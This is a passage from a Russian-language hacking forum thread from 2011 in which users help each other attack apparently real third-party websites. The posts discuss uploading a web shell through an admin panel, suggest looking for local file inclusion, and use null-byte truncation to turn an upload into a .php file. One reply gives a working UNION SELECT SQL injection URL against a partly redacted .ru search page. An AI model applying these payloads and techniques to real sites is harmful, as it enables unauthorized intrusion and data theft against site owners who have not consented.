Старый 23.06.2011, 00:20   #1091
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Почему?
А ты уверен, что есть права на выполнение и компил?
z0mbyak вне форума   Ответить с цитированием
Старый 23.06.2011, 04:29   #1092
slashd
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 27
По умолчанию

2Cross
Скорее всего раздел смонтирован с опцией noexec. Глянь mount.
slashd вне форума   Ответить с цитированием
Старый 23.06.2011, 14:48   #1093
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

admin-panel:заливаю шелл,сохраняется как jpeg и при открытие шелла,открывается исходный код шелла
есть какие варианти ?
зарание спасибо
salut вне форума   Ответить с цитированием
Старый 23.06.2011, 15:18   #1094
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от salut Посмотреть сообщение
admin-panel:заливаю шелл,сохраняется как jpeg и при открытие шелла,открывается исходный код шелла
есть какие варианти ?
зарание спасибо
Судя по вопросу, шансов у тебя мало.
Ищи LFI на сайте.
M_script вне форума   Ответить с цитированием
Старый 26.06.2011, 17:56   #1095
SeNaP
 
Аватар для SeNaP
 
Регистрация: 03.08.2010
Сообщений: 152
Репутация: 10
По умолчанию

Всем привет, возможно ли как нибудь обратиться к папке, если у неё в названии присутствует null byte символ (/test%00/)?
Просто при копировании файла, создаётся папка и туда копируется файл с таким же названием
Код:
/dir/1/1.mp3
Чтобы обрезать расширение файла юзаю null byte, в итоге получаю
Код:
/dir/1%00/1.php
SeNaP вне форума   Ответить с цитированием
Старый 26.06.2011, 18:10   #1096
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

копировании чем? что ты пытаешься сделать "обрезав расширение"?
рискну предположить что дело о пхп, нуллбайт = \0, а не %00

http://pastebin.com/raw.php?i=qQmfj1z1
в первом случае я послал вгетом \0, во втором %00
__________________
Sad panda

Последний раз редактировалось nobody; 26.06.2011 в 18:29..
nobody вне форума   Ответить с цитированием
Старый 26.06.2011, 18:16   #1097
SeNaP
 
Аватар для SeNaP
 
Регистрация: 03.08.2010
Сообщений: 152
Репутация: 10
По умолчанию

Цитата:
Сообщение от nobody Посмотреть сообщение
копировании чем? что ты пытаешься сделать "обрезав расширение"?
рискну предположить что дело о пхп, нуллбайт = \0, а не %00
а если я передаю параметры через $_GET . то не %00 ?
SeNaP вне форума   Ответить с цитированием
Старый 26.06.2011, 18:18   #1098
JET
 
Регистрация: 26.06.2011
Сообщений: 5
Репутация: 0
По умолчанию

если отвечать только на вопрос "как обратиться к файлу в папке содержащей %00", то
допустим, у нас есть папка с названием "test%00"
мы кодируем каждый символ в url формат и получаем:
Код:
http://127.0.0.1/%74%65%73%74%25%30%30/1.php
JET вне форума   Ответить с цитированием
Старый 28.06.2011, 03:05   #1099
M.W.N.N.
 
Аватар для M.W.N.N.
 
Регистрация: 05.07.2010
Сообщений: 51
Репутация: 7
По умолчанию

Помогите раскрутить скулю пож-та:
http://www.***.ru/search/?action=index&
text=%27&image.x=0&image.y=0

Последний раз редактировалось Twost; 17.05.2013 в 11:45..
M.W.N.N. вне форума   Ответить с цитированием
Старый 28.06.2011, 04:06   #1100
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

http://www.***.ru/search/?action=index&text=%27%29+union+select+1,2,user%28 %29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22--+&image.x=0&image.y=0

судя по ошибке и юзеру мускула....короче мда
__________________
Sad panda

Последний раз редактировалось Twost; 17.05.2013 в 11:45..
nobody вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot